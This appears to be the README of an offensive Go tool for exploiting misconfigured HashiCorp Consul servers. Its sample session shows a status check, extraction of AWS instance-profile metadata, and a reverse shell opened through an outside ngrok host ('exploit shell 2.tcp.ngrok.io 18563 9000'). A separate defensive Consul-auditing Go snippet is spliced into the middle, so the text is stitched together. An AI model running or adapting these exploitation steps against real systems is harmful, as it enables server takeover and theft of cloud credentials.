
Scanning / Exploiting vulnerable HashiCorp infra

Primary language: Go


Scanning / Exploiting vulnerable HashiCorp tools

Features: Consul

  • AWS metadata extraction
  • Status (check if vulnerable)
  • Reverse shell
  • Custom payload
  • Scanning for vulnerable servers

Features: Nomad (coming soon)

  • AWS metadata extraction
  • Status (check if vulnerable)
  • Reverse shell (raw_exec / exec / docker)
  • Custom payload
  • Scanning for vulnerable servers


Start ngrok: ./ngrok tcp 9000

Connected <>$ check status
DisableRemoteExec: true
EnableRemoteScriptChecks: true
NodeName: mini.hsd1.wa.comcast.net
Version: 1.9.3
Server: true
Connected <>$ exploit metadata
Check Registered
Waiting for command to register...
ID: Test
HTTP GET 200 OK Output: {
  "Code" : "Success",
  "LastUpdated" : "2021-02-25T06:15:20Z",
  "InstanceProfileArn" : "arn:aws:iam::*************************************",
  "InstanceProfileId" : "AIPA2LE*************"
Check Deregistered
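
A defender-side version of the status check above, as an added example that is not part of this tool or its README: it parses a saved /v1/agent/self response from your own Consul agent and reports the two settings the status output shows. The sample JSON, the AuditAgent name, and the placement of these fields under Config and DebugConfig are assumptions of this example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// agentSelf keeps only the fields the status output on this page reports.
type agentSelf struct {
	Config struct {
		NodeName string
		Server   bool
	}
	DebugConfig struct {
		DisableRemoteExec        bool
		EnableRemoteScriptChecks bool
	}
}

// sampleSelf is a constructed response with the same settings as the output above.
const sampleSelf = `{"Config": {"NodeName": "node-a.example", "Server": true},
 "DebugConfig": {"DisableRemoteExec": true, "EnableRemoteScriptChecks": true}}`

// AuditAgent returns one finding per setting that lets a remote caller run
// commands on the agent. A key missing from the JSON is treated as unsafe.
func AuditAgent(raw []byte) ([]string, error) {
	var a agentSelf
	if err := json.Unmarshal(raw, &a); err != nil {
		return nil, fmt.Errorf("parse agent self: %w", err)
	}
	who := fmt.Sprintf("%s (server=%t)", a.Config.NodeName, a.Config.Server)
	var findings []string
	if a.DebugConfig.EnableRemoteScriptChecks {
		findings = append(findings, who+": script checks can be registered over the HTTP API; replace enable_script_checks with enable_local_script_checks and require ACL tokens")
	}
	if !a.DebugConfig.DisableRemoteExec {
		findings = append(findings, who+": consul exec is accepted; set disable_remote_exec = true")
	}
	return findings, nil
}

func main() {
	findings, err := AuditAgent([]byte(sampleSelf))
	if err != nil {
		panic(err)
	}
	fmt.Println(strings.Join(findings, "\n"))
}
```

An empty result means neither remote command path is enabled on that agent.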

Arguments: (cmd ngrok-host ngrok-port local-port). An external IP can be used in place of ngrok.

Connected <>$ exploit shell 2.tcp.ngrok.io 18563 9000
Check Registered
Waiting for callback...
2021/02/24 23:16:21 Listening on localhost:9000
Check Deregistered
Client connected.
bash-$: whoami